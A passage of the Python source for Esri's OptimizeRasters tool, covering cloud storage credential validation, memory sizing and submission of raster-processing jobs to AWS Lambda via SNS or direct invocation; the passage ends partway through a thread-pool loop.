# -inputbucket -outputbucket -rasterproxypath -clouddownloadtype -clouduploadtype
# -usetoken
# Usage: python.exe OptimizeRasters.py <arguments>
# Note: OptimizeRasters.xml (config) file is placed alongside OptimizeRasters.py
# OptimizeRasters.py is entirely case-sensitive, extensions/paths in the config
# file are case-sensitive and the program will fail if the correct paths are not
# entered at the cmd-line/UI or in the config file.
# Author: Esri Imagery Workflows team
# ------------------------------------------------------------------------------
# !/usr/bin/env python
# IMPORTANT> Set (CRUN_IN_AWSLAMBDA) to (True) when the OptimizeRasters.py is used within the (lambda_function.zip) to act as a lambda function.
import tarfile
import mimetypes
import fnmatch
from datetime import datetime, timedelta
import binascii
import hashlib
import json
import ctypes
import math
import argparse
import shutil
import subprocess
from xml.dom import minidom
import time
import threading
import mmap
import base64
import os
import sys
def getBooleanValue(value):
    """Interpret *value* as a boolean flag.

    None maps to False; real bools pass through unchanged; anything else is
    stringified and matched case-insensitively against the accepted truthy
    spellings ('true', 'yes', 't', '1', 'y'). Everything else is False.
    """
    if value is None:
        return False
    if isinstance(value, bool):
        return value
    return str(value).lower() in ('true', 'yes', 't', '1', 'y')
# Runtime feature flags, driven by environment variables.
# (CRUN_IN_AWSLAMBDA) must be (True) when OptimizeRasters.py runs inside the
# (lambda_function.zip) AWS Lambda deployment.
CRUN_IN_AWSLAMBDA = getBooleanValue(
    os.environ.get('OR_RUNTIME_AWSLAMBDA', False))
# Skip the GDAL availability check at startup.
CDISABLE_GDAL_CHECK = getBooleanValue(os.environ.get('OR_DISABLE_GDAL', False))
# Skip the product version check at startup.
CDisableVersionCheck = getBooleanValue(
    os.environ.get('OR_DISABLE_VER_CHECK', False))
# Python 2/3 compatibility: expose (ConfigParser), (urlopen) and (urlencode)
# under common names for both major versions.
if (sys.version_info[0] < 3):
    import ConfigParser
    from urllib import urlopen, urlencode
else:
    import configparser as ConfigParser
    from urllib.request import urlopen
    from urllib.parse import urlencode
# ends
# enum error codes (process/function return statuses)
eOK = 0
eFAIL = 1
# ends
CEXEEXT = '.exe'
CONST_OUTPUT_EXT = '.%s' % ('mrf')  # default output extension (.mrf)
CloudOGTIFFExt = '.cogtiff'
COGTIFFAuxFile = '.tif.cogtiff.aux.xml'
UpdateOrjobStatus = 'updateOrjobStatus'
CreateOverviews = 'createOverviews'
DefJpegQuality = 85  # default JPEG compression quality
# const related to (Reporter) class
CRPT_SOURCE = 'SOURCE'
CRPT_COPIED = 'COPIED'
CRPT_PROCESSED = 'PROCESSED'
CRPT_UPLOADED = 'UPLOADED'
CRPT_HEADER_KEY = 'config'
CPRT_HANDLER = 'handler_resume_reporter'
CRPT_YES = 'yes'
CRPT_NO = 'no'
CRPT_UNDEFINED = ''
# ends
# user hsh const
USR_ARG_UPLOAD = 'upload'
USR_ARG_DEL = 'del'
# ends
# PL
CPLANET_IDENTIFY = 'api.planet.com'
SigAlibaba = 'aliyuncs.com'  # marker in endpoint URLs identifying Alibaba OSS
# Del delay
CDEL_DELAY_SECS = 20
# ends
CPRJ_NAME = 'ProjectName'
CLOAD_RESTORE_POINT = '__LOAD_RESTORE_POINT__'
CCMD_ARG_INPUT = '__CMD_ARG_INPUT__'
CVSICURL_PREFIX = '/vsicurl/'
# utility const
CSIN_UPL = 'SIN_UPL'
CINC_SUB = 'INC_SUB'
# supported (-op) operation keywords
COP_UPL = 'upload'
COP_DNL = 'download'
COP_RPT = 'report'
COP_NOCONVERT = 'noconvert'
COP_LAMBDA = 'lambda'
COP_COPYONLY = 'copyonly'
COP_CREATEJOB = 'createjob'
# ends
# clone specific
CCLONE_PATH = 'clonepath'
# ends
# -cache path
CCACHE_PATH = 'cache'
# ends
# resume constants
CRESUME = '_RESUME_'
CRESUME_MSG_PREFIX = '[Resume]'
CRESUME_ARG = 'resume'
CRESUME_ARG_VAL_RETRYALL = 'retryall'
CRESUME_HDR_INPUT = 'input'
CRESUME_HDR_OUTPUT = 'output'
InputProfile = 'inputprofile'
OutputProfile = 'outputprofile'
# ends
CINPUT_PARENT_FOLDER = 'Input_ParentFolder'
CUSR_TEXT_IN_PATH = 'hashkey'
CRASTERPROXYPATH = 'rasterproxypath'
CTEMPOUTPUT = 'tempoutput'
CTEMPINPUT = 'tempinput'
CISTEMPOUTPUT = 'istempoutput'
CISTEMPINPUT = 'istempinput'
# hash-token insertion defaults (see Base.insertUserTextToOutputPath)
CHASH_DEF_INSERT_POS = 2
CHASH_DEF_CHAR = '#'
CHASH_DEF_SPLIT_CHAR = '@'
UseToken = 'usetoken'
UseTokenOnOuput = 'usetokenonoutput'
CTimeIt = 'timeit'
# const node-names in the config file
CCLOUD_AMAZON = 'amazon'
CCLOUD_AZURE = 'azure'
CCLOUD_GOOGLE = 'google'
CDEFAULT_TIL_PROCESSING = 'DefaultTILProcessing'
# Azure constants
COUT_AZURE_PARENTFOLDER = 'Out_Azure_ParentFolder'
COUT_AZURE_ACCOUNTNAME = 'Out_Azure_AccountName'
COUT_AZURE_ACCOUNTKEY = 'Out_Azure_AccountKey'
COUT_AZURE_CONTAINER = 'Out_Azure_Container'
COUT_AZURE_ACCESS = 'Out_Azure_Access'
COUT_AZURE_PROFILENAME = 'Out_Azure_ProfileName'
CIN_AZURE_PARENTFOLDER = 'In_Azure_ParentFolder'
CIN_AZURE_CONTAINER = 'In_Azure_Container'
COP = 'Op'
# ends
# google constants
COUT_GOOGLE_BUCKET = 'Out_Google_Bucket'
COUT_GOOGLE_PROFILENAME = 'Out_Google_ProfileName'
CIN_GOOGLE_PARENTFOLDER = 'In_Google_ParentFolder'
COUT_GOOGLE_PARENTFOLDER = 'Out_Google_ParentFolder'
# ends
CCLOUD_UPLOAD_THREADS = 20  # applies to both (azure and amazon/s3)
CCLOUD_UPLOAD = 'CloudUpload'
CCLOUD_UPLOAD_OLD_KEY = 'Out_S3_Upload'
COUT_CLOUD_TYPE = 'Out_Cloud_Type'
COUT_S3_PARENTFOLDER = 'Out_S3_ParentFolder'
COUT_S3_ACL = 'Out_S3_ACL'
CIN_S3_PARENTFOLDER = 'In_S3_ParentFolder'
CIN_S3_PREFIX = 'In_S3_Prefix'
CIN_CLOUD_TYPE = 'In_Cloud_Type'
COUT_VSICURL_PREFIX = 'Out_VSICURL_Prefix'
CINOUT_S3_DEFAULT_DOMAIN = 's3.amazonaws.com'
DefS3Region = 'us-east-1'
COUT_DELETE_AFTER_UPLOAD_OBSOLETE = 'Out_S3_DeleteAfterUpload'
COUT_DELETE_AFTER_UPLOAD = 'DeleteAfterUpload'
CFGLogPath = 'LogPath'
TarGz = 'tarGz'
TarGzExt = '.tar.gz'
# ends
# const
CCFG_FILE = 'OptimizeRasters.xml'
CCFG_GDAL_PATH = 'GDALPATH'
# ends
# til related
CTIL_EXTENSION_ = '.til'
# ends
CCACHE_EXT = '.mrf_cache'
CMRF_DOC_ROOT = 'MRF_META'  # <{CMRF_DOC_ROOT}> mrf XML root node
CMRF_DOC_ROOT_LEN = len(CMRF_DOC_ROOT) + 2  # includes '<' and '>' in XML node.
# global dbg flags
CS3_MSG_DETAIL = False
CS3_UPLOAD_RETRIES = 3
# ends
# S3Storage direction
CS3STORAGE_IN = 0
CS3STORAGE_OUT = 1
# ends
class TimeIt(object):
    """Collects per-file timing statistics via the (timeOperation) decorator.

    Elapsed seconds are filed under ``store.timedInfo['files']`` where
    ``store`` is a keyword argument of the decorated call.
    """
    Name = 'Name'
    Conversion = 'Conversion'
    Overview = 'Overview'
    Download = 'Download'
    Upload = 'Upload'

    def __init__(self):
        pass

    @staticmethod
    def timeOperation(func):
        # Decorator: time (func) and record the elapsed seconds against the
        # caller-supplied (name)/(store)/(method) keyword arguments.
        def wrapper(*args, **kwargs):
            begin = time.time()
            outcome = func(*args, **kwargs)
            if (not outcome):
                return outcome  # failed operations aren't timed.
            elapsed = time.time() - begin
            if ('name' in kwargs):
                if (kwargs['name'] is None):
                    return outcome
                entries = kwargs['store'].timedInfo['files']
                foundAt = -1
                for position, entry in enumerate(entries):
                    if (kwargs['name'] in entry[TimeIt.Name]):
                        foundAt = position
                        break
                if (foundAt == -1):
                    entries.append({TimeIt.Name: kwargs['name']})
                    foundAt = len(entries) - 1
                # default operation bucket is 'processing'.
                operation = kwargs['method'] if 'method' in kwargs else 'processing'
                if ('store' in kwargs):
                    entries[foundAt][operation] = '%.3f' % elapsed
            return outcome
        return wrapper
class UI(object):
    """Base class for credential/profile UI helpers.

    Accumulates validation error strings and the bucket/container names
    discovered for the given credential profile.
    """

    def __init__(self, profileName=None):
        # (profileName) may be a credential profile name or a key-file path.
        self._profileName = profileName
        self._errorText = []          # collected error strings.
        self._availableBuckets = []   # bucket/container names found.

    @property
    def errors(self):
        """Iterator over the error messages collected so far."""
        return iter(self._errorText)
class ProfileEditorUI(UI):
    """Validates cloud storage credentials (AWS/Alibaba, Azure, Google) and
    collects the buckets/containers visible to them."""
    # supported storage back-end identifiers.
    TypeAmazon = 'amazon'
    TypeAzure = 'azure'
    TypeGoogle = 'google'
    TypeAlibaba = 'alibaba'

    def __init__(self, profileName, storageType, accessKey, secretkey, credentialProfile=None, **kwargs):
        super(ProfileEditorUI, self).__init__(profileName)
        self._accessKey = accessKey
        self._secretKey = secretkey
        self._storageType = storageType
        self._credentialProfile = credentialProfile
        self._properties = kwargs  # extra options, e.g. 'aws_endpoint_url'.

    def validateCredentials(self):
        """Return True when the stored credentials are usable.

        Side effect: fills self._availableBuckets on success. Errors are
        appended to self._errorText.
        """
        try:
            azure_storage = None
            if (self._storageType == self.TypeAmazon or
                    self._storageType == self.TypeAlibaba):
                import boto3
                import botocore.config
                import botocore
                session = boto3.Session(self._accessKey, self._secretKey,
                                        profile_name=self._credentialProfile if self._credentialProfile else None)
                awsCredentials = ConfigParser.RawConfigParser()
                rootPath = '.aws'
                AwsEndpoint = 'aws_endpoint_url'
                if (self._credentialProfile):
                    # Alibaba profiles live under a separate credentials file.
                    if (self._storageType == self.TypeAlibaba):
                        rootPath = '.OptimizeRasters/Alibaba'
                    userHome = '{}/{}/{}'.format(os.path.expanduser(
                        '~').replace('\\', '/'), rootPath, 'credentials')
                    awsCredentials.read(userHome)
                    if (not awsCredentials.has_section(self._credentialProfile)):
                        return False
                # optional custom endpoint from the credentials file...
                endPoint = awsCredentials.get(self._credentialProfile, AwsEndpoint) if awsCredentials.has_option(
                    self._credentialProfile, AwsEndpoint) else None
                # ...which the caller-supplied properties may override.
                if (AwsEndpoint in self._properties):
                    endPoint = self._properties[AwsEndpoint]
                useAlibaba = endPoint and endPoint.lower().find(SigAlibaba) != -1
                con = session.resource('s3', endpoint_url=endPoint, config=botocore.config.Config(
                    s3={'addressing_style': 'virtual'}))
                # this will throw if credentials are invalid.
                [self._availableBuckets.append(i.name)
                 for i in con.buckets.all()]
            elif(self._storageType == self.TypeAzure):
                # NOTE: (Azure) is a helper class defined elsewhere in this file.
                azure_storage = Azure(
                    self._accessKey, self._secretKey, self._credentialProfile, None)
                azure_storage.init()
                # this will throw.
                [self._availableBuckets.append(
                    i.name) for i in azure_storage._blobSrvCli.list_containers()]
            elif(self._storageType == self.TypeGoogle):
                # (profileName) is the path to a service-account JSON key file.
                with open(self._profileName, 'r') as reader:
                    serviceJson = json.load(reader)
                Project_Id = 'project_id'
                if (Project_Id not in serviceJson):
                    raise Exception(
                        '(Project_Id) key isn\'t found in file ({})'.format(self._profileName))
                os.environ['GCLOUD_PROJECT'] = serviceJson[Project_Id]
                os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = self._profileName
                try:
                    from google.cloud import storage
                    gs = storage.Client()
                except Exception as e:
                    self._errorText.append(str(e))
                    return False
                [self._availableBuckets.append(bucket.name)
                 for bucket in gs.list_buckets()]
            else:
                raise Exception('Invalid storage type')
        except Exception as e:
            MsgInvalidCredentials = 'Invalid Credentials>'
            if (self._storageType == self.TypeAmazon or
                    self._storageType == self.TypeAlibaba):
                try:
                    from botocore.exceptions import ClientError
                except ImportError as e:
                    self._errorText.append(str(e))
                    return False
                if (isinstance(e, ClientError)):
                    exCode = e.response['Error']['Code'].lower()
                    if (exCode not in ['invalidaccesskeyid', 'signaturedoesnotmatch']):
                        # the user may not have the access rights to list buckets but the bucket keys/contents could be accessed if the bucket name is known.
                        return True
                    elif(exCode in ['accessdenied']):
                        # NOTE(review): this branch is unreachable — when the
                        # preceding condition is False, (exCode) is one of
                        # 'invalidaccesskeyid'/'signaturedoesnotmatch', so it
                        # can never equal 'accessdenied'.
                        # the user has valid credentials but without the bucketlist permission.
                        return True
            elif(self._storageType == self.TypeAzure):
                if (azure_storage):
                    # It's assumed, SAS string credentials aren't allowed to list buckets and the bucket name is picked from the SAS string.
                    if (azure_storage._SASToken):
                        self._availableBuckets.append(azure_storage._SASBucket)
                        return True
            self._errorText.append(MsgInvalidCredentials)
            self._errorText.append(str(e))
            return False
        return True
class OptimizeRastersUI(ProfileEditorUI):
    """UI helper that validates a named credential profile and reports the
    buckets it can see."""

    def __init__(self, profileName, storageType):
        # no explicit key pair; the named profile supplies the credentials.
        super(OptimizeRastersUI, self).__init__(
            profileName, storageType, None, None, profileName)

    def getAvailableBuckets(self):
        """Validate credentials and return {'response': {'results': bool,
        'buckets': [...]}} — buckets stays empty on failure."""
        succeeded = self.validateCredentials()
        buckets = self._availableBuckets if succeeded else []
        return {'response': {'results': succeeded, 'buckets': buckets}}
class MEMORYSTATUSEX(ctypes.Structure):
    """Free-memory probe used to size cloud transfer chunks.

    On Windows it mirrors the Win32 (MEMORYSTATUSEX) structure filled by
    GlobalMemoryStatusEx; on posix it shells out to free(1).
    """
    _fields_ = [
        ("dwLength", ctypes.c_ulong),
        ("dwMemoryLoad", ctypes.c_ulong),
        ("ullTotalPhys", ctypes.c_ulonglong),
        ("ullAvailPhys", ctypes.c_ulonglong),
        ("ullTotalPageFile", ctypes.c_ulonglong),
        ("ullAvailPageFile", ctypes.c_ulonglong),
        ("ullTotalVirtual", ctypes.c_ulonglong),
        ("ullAvailVirtual", ctypes.c_ulonglong),
        ("sullAvailExtendedVirtual", ctypes.c_ulonglong),
    ]

    def __init__(self):
        # dwLength must be initialized before GlobalMemoryStatusEx is called.
        self.dwLength = ctypes.sizeof(self)
        super(MEMORYSTATUSEX, self).__init__()
        self.isLinux = os.name == 'posix'
        self.CMINSIZEALLOWED = 5242880  # 5 MB lower bound per chunk.

    def memoryStatus(self):
        # Windows only: fill this structure in place via the kernel32 call.
        if (not self.isLinux):
            ctypes.windll.kernel32.GlobalMemoryStatusEx(ctypes.byref(self))
        return self

    def getFreeMem(self):
        """Return ~1% of available physical memory in bytes (floor on error)."""
        if (self.isLinux):
            try:
                # NOTE(review): split()[2] is the 'used' column of free(1)
                # output ('Mem:' total used free ...) — confirm index 3
                # ('free') wasn't intended.
                return int(int(os.popen("free -b").readlines()[1].split()[2]) * .01)
            except Exception as e:
                return self.CMINSIZEALLOWED
        # download file isn't split in chunks, for now usage is set to 0.01
        return int(self.memoryStatus().ullAvailPhys * .01)

    def memoryPerDownloadChunk(self):
        """Bytes to buffer per download chunk."""
        return self.getFreeMem()

    # get upload payload size per thread for the total cloud upload threads required.
    def memoryPerUploadChunk(self, totalThreads):
        memPerChunk = self.getFreeMem() / totalThreads
        if (memPerChunk < self.CMINSIZEALLOWED):
            memPerChunk = self.CMINSIZEALLOWED
        return memPerChunk
class Lambda:
    """Drives OptimizeRasters jobs on AWS Lambda.

    Splits an .orjob file into queue-sized pieces and dispatches each piece
    either through an SNS topic or by invoking a Lambda function directly.
    """
    # keys read from the ~/.aws/credentials profile section.
    account_name = 'aws_access_key_id'
    account_key = 'aws_secret_access_key'
    account_region = 'region'
    account_sns = 'sns_arn'
    queue_length = 'queuelength'

    def __init__(self, base=None):
        self._sns_aws_access_key = \
            self._sns_aws_secret_access_key = None
        self._sns_region = 'us-east-1'
        self._sns_ARN = None
        self._sns_connection = None
        self._aws_credentials = None  # aws credential file.
        self._base = base             # (Base) instance used for messaging/config.

    def initSNS(self, keyProfileName):
        """Load AWS credentials for *keyProfileName* and open/verify the SNS
        topic connection. Returns False on any failure."""
        if (not keyProfileName):
            return False
        self._aws_credentials = ConfigParser.RawConfigParser()
        userHome = '{}/{}/{}'.format(os.path.expanduser(
            '~').replace('\\', '/'), '.aws', 'credentials')
        with open(userHome) as fptr:
            self._aws_credentials.read_file(fptr)
        if (not self._aws_credentials.has_section(keyProfileName)):
            return False
        self._sns_aws_access_key = self._aws_credentials.get(
            keyProfileName, self.account_name) if self._aws_credentials.has_option(keyProfileName, self.account_name) else None
        self._sns_aws_secret_access_key = self._aws_credentials.get(
            keyProfileName, self.account_key) if self._aws_credentials.has_option(keyProfileName, self.account_key) else None
        if (self._aws_credentials.has_option(keyProfileName, self.account_region)):
            self._sns_region = self._aws_credentials.get(
                keyProfileName, self.account_region)
        self._sns_ARN = self._aws_credentials.get(keyProfileName, self.account_sns) if self._aws_credentials.has_option(
            keyProfileName, self.account_sns) else None
        if (not self._sns_aws_access_key or
                not self._sns_aws_secret_access_key):
            return False
        try:
            import boto3
            session = boto3.Session(aws_access_key_id=self._sns_aws_access_key,
                                    aws_secret_access_key=self._sns_aws_secret_access_key, region_name=self._sns_region)
            self._sns_connection = session.resource('sns')
            # verify the topic is reachable with these credentials.
            self._sns_connection.meta.client.get_topic_attributes(
                TopicArn=self._sns_ARN)
        except ImportError as e:
            self._base.message('({})/Lambda'.format(str(e)),
                               self._base.const_critical_text)
            return False
        except Exception as e:
            self._base.message('SNS/init\n{}'.format(str(e)),
                               self._base.const_critical_text)
            return False
        return True

    def _updateCredentials(self, doc, direction='In'):
        """Replace the {In|Out}_S3_AWS_ProfileName node in the parameter XML
        (*doc*) with explicit key-pair nodes — Lambda has no local credential
        profiles. Returns False when no usable credentials are found."""
        inProfileNode = doc.getElementsByTagName(
            '{}_S3_AWS_ProfileName'.format(direction))
        inKeyIDNode = doc.getElementsByTagName('{}_S3_ID'.format(direction))
        inKeySecretNode = doc.getElementsByTagName(
            '{}_S3_Secret'.format(direction))
        rptProfile = self._base.getUserConfiguration.getValue(
            '{}_S3_AWS_ProfileName'.format(direction))
        # gives a chance to overwrite the profile name in the parameter file with the orjob one.
        _resumeReporter = self._base.getUserConfiguration.getValue(
            CPRT_HANDLER)
        # unless the orjob was edited manually, the profile name on both would be the same.
        if (_resumeReporter):
            selectProfile = InputProfile if direction == 'In' else OutputProfile
            if (selectProfile in _resumeReporter._header):
                rptProfile = _resumeReporter._header[selectProfile]
        CERR_MSG = 'Credential keys don\'t exist/invalid'
        if ((not len(inProfileNode) or
             not inProfileNode[0].hasChildNodes() or
             not inProfileNode[0].firstChild) and
                not rptProfile):
            # no profile name anywhere; explicit key nodes must be present.
            if (not len(inKeyIDNode) or
                    not len(inKeySecretNode)):
                self._base.message(CERR_MSG, self._base.const_critical_text)
                return False
            if (not inKeyIDNode[0].hasChildNodes() or
                    not inKeyIDNode[0].firstChild):
                self._base.message(CERR_MSG, self._base.const_critical_text)
                return False
        else:
            # resolve the profile to a key pair and write it into the XML.
            keyProfileName = rptProfile if rptProfile else inProfileNode[0].firstChild.nodeValue
            if (not self._aws_credentials.has_section(keyProfileName)):
                return False
            parentNode = doc.getElementsByTagName('Defaults')
            if (not len(parentNode)):
                self._base.message('Unable to update credentials',
                                   self._base.const_critical_text)
                return False
            _sns_aws_access_key = self._aws_credentials.get(
                keyProfileName, self.account_name) if self._aws_credentials.has_option(keyProfileName, self.account_name) else None
            _sns_aws_secret_access_key = self._aws_credentials.get(
                keyProfileName, self.account_key) if self._aws_credentials.has_option(keyProfileName, self.account_key) else None
            # an explicit key node in the XML wins over the profile's value.
            if (len(inKeyIDNode)):
                if (inKeyIDNode[0].hasChildNodes() and
                        inKeyIDNode[0].firstChild.nodeValue):
                    _sns_aws_access_key = inKeyIDNode[0].firstChild.nodeValue
                parentNode[0].removeChild(inKeyIDNode[0])
            inKeyIDNode = doc.createElement('{}_S3_ID'.format(direction))
            inKeyIDNode.appendChild(
                doc.createTextNode(str(_sns_aws_access_key)))
            parentNode[0].appendChild(inKeyIDNode)
            if (len(inKeySecretNode)):
                if (inKeySecretNode[0].hasChildNodes() and
                        inKeySecretNode[0].firstChild.nodeValue):
                    _sns_aws_secret_access_key = inKeySecretNode[0].firstChild.nodeValue
                parentNode[0].removeChild(inKeySecretNode[0])
            inKeySecretNode = doc.createElement(
                '{}_S3_Secret'.format(direction))
            inKeySecretNode.appendChild(
                doc.createTextNode(str(_sns_aws_secret_access_key)))
            parentNode[0].appendChild(inKeySecretNode)
            # drop the profile node; the key pair replaces it.
            if (inProfileNode.length):
                parentNode[0].removeChild(inProfileNode[0])
            if (not _sns_aws_access_key or
                    not _sns_aws_secret_access_key):
                self._base.message(CERR_MSG, self._base.const_critical_text)
                return False
        return True

    def submitJob(self, orjob):
        """Split *orjob* into queue-length batches and submit each batch via
        SNS or direct Lambda function invocation."""
        if (not self._sns_connection or
                not orjob):
            return False
        _orjob = Report(Base())
        if (not _orjob.init(orjob) or
                not _orjob.read()):
            self._base.message('Job file read error',
                               self._base.const_critical_text)
            return False
        orjobName = os.path.basename(orjob)
        orjobWOExt = orjobName.lower().replace(Report.CJOB_EXT, '')
        configPath = _orjob._header['config']
        configName = '{}.xml'.format(orjobWOExt)
        # rewrite local paths to the lambda /tmp sandbox.
        if (CTEMPINPUT in _orjob._header):
            _orjob._header[CTEMPINPUT] = '/tmp/{}/tempinput'.format(orjobWOExt)
        if (CTEMPOUTPUT in _orjob._header):
            _orjob._header[CTEMPOUTPUT] = '/tmp/{}/tempoutput'.format(
                orjobWOExt)
        if (CRASTERPROXYPATH in _orjob._header):
            # remember the original raster-proxy path before remapping it.
            _orjob._header['store{}'.format(
                CRASTERPROXYPATH)] = _orjob._header[CRASTERPROXYPATH]
            _orjob._header[CRASTERPROXYPATH] = '/tmp/{}/{}'.format(
                orjobWOExt, CRASTERPROXYPATH)
        if ('config' in _orjob._header):
            _orjob._header['config'] = '/tmp/{}'.format(configName)
        configContent = ''
        try:
            with open(configPath, 'rb') as f:
                configContent = f.read()
        except Exception as e:
            self._base.message('{}'.format(str(e)),
                               self._base.const_critical_text)
            return False
        try:
            doc = minidom.parseString(configContent)
            # skip looking into the parameter file for credentials if the input is a direct HTTP link with no requirement to pre-download the raster/file before processing.
            if (not _orjob._isInputHTTP):
                if (not self._updateCredentials(doc, 'In')):
                    return False
            if (not self._updateCredentials(doc, 'Out')):
                return False
            configContent = doc.toprettyxml()
        except Exception as e:
            self._base.message(str(e), self._base.const_critical_text)
            return False
        orjobHeader = ''
        for hdr in _orjob._header:
            # lambda works with AWS key pairs and not profile names.
            if (hdr in [InputProfile, OutputProfile]):
                continue
            orjobHeader += '# {}={}\n'.format(hdr, _orjob._header[hdr])
        length = len(_orjob._input_list)
        jobQueue = self._base.getUserConfiguration.getValue(self.queue_length)
        if (not jobQueue):
            # read from orjob/reporter if not in at cmd-line
            jobQueue = _orjob._header[self.queue_length] if self.queue_length in _orjob._header else None
        # fix: header/config values are read as strings — coerce to int so the
        # comparisons and the range() below don't raise TypeError (Python 3).
        if (jobQueue is not None):
            try:
                jobQueue = int(jobQueue)
            except (TypeError, ValueError):
                jobQueue = None
        if (not jobQueue or
                jobQueue and
                (jobQueue <= 0 or
                 jobQueue > length)):
            jobQueue = length
        i = 0
        errLambda = False
        functionJobs = []
        functionName = None
        useLambdaFunction = False
        # operation format: 'lambda[:function:<name>]'
        lambdaArgs = _orjob.operation.split(':')
        if (len(lambdaArgs) > 2):
            if (lambdaArgs[1].lower() == 'function'):
                # preserve case in lambda functions.
                functionName = lambdaArgs[2]
                useLambdaFunction = True
        self._base.message('Invoke using ({})'.format(
            'Function' if useLambdaFunction else 'SNS'))
        while(i < length):
            orjobContent = ''
            for j in range(i, i + jobQueue):
                if (j == length):
                    break
                f = _orjob._input_list[j]
                if (f.endswith('/')):
                    i += 1
                    continue  # skip folder entries
                if (not orjobContent):
                    orjobContent += orjobHeader
                orjobContent += '{}\n'.format(f)
                i += 1
            if (not orjobContent):
                continue
            store = {'orjob': {'file': '{}_{}{}'.format(orjobWOExt, i, Report.CJOB_EXT), 'content': orjobContent}, 'config': {
                'file': configName, 'content': configContent}}
            message = json.dumps(store)
            if (useLambdaFunction):
                functionJobs.append(message)
            else:
                if (not self.invokeSNS(message)):
                    errLambda = True
        if (useLambdaFunction and
                not self.invokeFunction(functionName, functionJobs)):
            errLambda = True
        return not errLambda

    def invokeSNS(self, message):
        """Publish one batch *message* to the configured SNS topic."""
        publish = None
        try:
            publish = self._sns_connection.meta.client.publish(
                TopicArn=self._sns_ARN, Message=message, Subject='OR')
            CPUBLISH_META = 'ResponseMetadata'
            if (CPUBLISH_META in publish and
                    'RequestId' in publish[CPUBLISH_META]):
                self._base.message('Lambda working on the (RequestID) [{}]...'.format(
                    publish[CPUBLISH_META]['RequestId']))
        except Exception as e:
            self._base.message('{}'.format(str(e)),
                               self._base.const_critical_text)
            return False
        return True

    def invokeFunction(self, functionName, message):
        """Invoke *functionName* once per batch in *message* (a list of JSON
        strings) using a thread pool; returns False if any invocation fails."""
        if (not functionName or
                not message):
            return False
        try:
            payloads = []
            MaxJobs = len(message)
            for i in range(0, MaxJobs):
                # wrap each batch in an SNS-style event record.
                payload = {'Records': [{'Sns': {'Message': message[i]}}]}
                payloads.append(payload)
            timeStart = datetime.now()
            pool = ThreadPool(LambdaFunction, base=self._base, function_name=functionName,
                              aws_access_key_id=self._sns_aws_access_key, aws_secret_access_key=self._sns_aws_secret_access_key)
            pool.init(maxWorkers=100)
            for i in range(0, len(payloads)):
                pool.addWorker(payloads[i], i)
            pool.run()
            self._base.getUserConfiguration.getValue(
                CPRT_HANDLER).write()  # update .orjob status
            self._base.message('duration> {}s'.format(
                (datetime.now() - timeStart).total_seconds()))
            if (pool.isErrorDetected):
                return False
        except Exception as e:
            self._base.message('{}'.format(str(e)),
                               self._base.const_critical_text)
            return False
        return True
class LambdaFunction(threading.Thread):
    """Worker thread that invokes one AWS Lambda function call and syncs the
    response back into the resume reporter."""
    Base = 'base'  # kwargs key holding the shared (Base) instance.

    def __init__(self, kwargs):
        threading.Thread.__init__(self)
        self.daemon = True
        self.function = None   # lambda function name; set in init().
        self.kwargs = kwargs
        self.result = None     # raw invoke() response.
        self.base = None
        if (self.Base in kwargs and
                isinstance(kwargs[self.Base], Base)):
            self.base = kwargs[self.Base]
        pass

    def init(self, payload, jobID=0):
        """Bind the invocation *payload* and *jobID*; False when no
        'function_name' was supplied in kwargs."""
        FunctionName = 'function_name'
        if (FunctionName in self.kwargs):
            self.function = self.kwargs[FunctionName]
        if (self.function is None):
            return False
        self.payload = payload
        self.jobID = jobID
        return True

    @property
    def response(self):
        """Raw boto3 invoke() response (None until run() completes)."""
        return self.result

    def message(self, message, messageType=0):
        # route through the (Base) handler when available, else print.
        if (self.base is not None):
            if (hasattr(self.base, 'message')):
                return self.base.message(message, messageType)
        print(message)

    def run(self):
        try:
            import boto3
            import boto3.session
            session = boto3.session.Session()
            client = session.client('lambda', aws_access_key_id=self.kwargs['aws_access_key_id'] if 'aws_access_key_id' in self.kwargs else None,
                                    aws_secret_access_key=self.kwargs['aws_secret_access_key'] if 'aws_secret_access_key' in self.kwargs else None)
            # synchronous invocation; blocks until the lambda returns.
            self.result = client.invoke(FunctionName=self.function, InvocationType='RequestResponse',
                                        Payload=json.dumps(self.payload))
            respJSON = json.loads(self.result['Payload'].read())
            if (not respJSON):
                return None
            respStatus = respJSON['status'] if 'status' in respJSON else None
            if (self.base is not None):
                # merge the remote job results into the local resume report.
                report = self.base.getUserConfiguration.getValue(CPRT_HANDLER)
                report.syncRemoteToLocal(respJSON)
            self.message(
                'Completed/{}/Status [{}]'.format(self.jobID, str(respStatus)))
        except Exception as e:
            # 2 for critical
            self.message('{}'.format(
                e), self.base.const_critical_text if self.base else 2)
            if (self.base is not None):
                # NOTE: (CCFG_LAMBDA_INVOCATION_ERR) is defined elsewhere in
                # this file; ThreadPool.run checks it after the workers finish.
                self.base.getUserConfiguration.setValue(
                    CCFG_LAMBDA_INVOCATION_ERR, True)
            return False
        return True
class ThreadPool(object):
    """Minimal thread pool: runs (function) worker threads over queued jobs,
    keeping at most (maxWorkers) threads alive at a time."""
    DefMaxWorkers = 1
    Job = 'job'
    JobID = 'jobID'
    Base = 'base'

    def __init__(self, function, **kwargs):
        # (function) is a Thread subclass exposing init(job, jobID), e.g.
        # (LambdaFunction); (kwargs) are forwarded to each worker.
        self.maxWorkers = self.DefMaxWorkers
        self.function = function
        self.kwargs = kwargs
        self.base = None
        if (self.Base in kwargs and
                isinstance(kwargs[self.Base], Base)):
            self.base = kwargs[self.Base]
        self.work = []                 # queued jobs.
        self._isErrorDetected = False

    def init(self, maxWorkers=DefMaxWorkers):
        """Set the concurrent worker count (falls back to the default on
        invalid input)."""
        try:
            self.maxWorkers = int(maxWorkers)
            if (self.maxWorkers < 1):
                self.maxWorkers = self.DefMaxWorkers
        except BaseException:
            self.maxWorkers = self.DefMaxWorkers

    def addWorker(self, job, jobID=None):
        """Queue a job (with optional ID) for execution by run()."""
        self.work.append({self.Job: job, self.JobID: jobID})

    def message(self, message, messageType=0):
        # route through the (Base) handler when available, else print.
        if (self.base is not None):
            if (hasattr(self.base, 'message')):
                return self.base.message(message, messageType)
        print(message)

    @property
    def isErrorDetected(self):
        # True once any worker flagged an invocation error (see run()).
        return self._isErrorDetected

    def run(self):
        """Run all queued jobs; False on the first worker init failure or if
        any worker reported (CCFG_LAMBDA_INVOCATION_ERR)."""
        lenBuffer = self.maxWorkers
        threads = []
        workers = 0
        maxWorkers = len(self.work)
        while(1):
            len_threads = len(threads)
            # busy-wait until at least one running thread has finished; the
            # number of dead threads becomes the next scheduling batch size.
            while(len_threads):
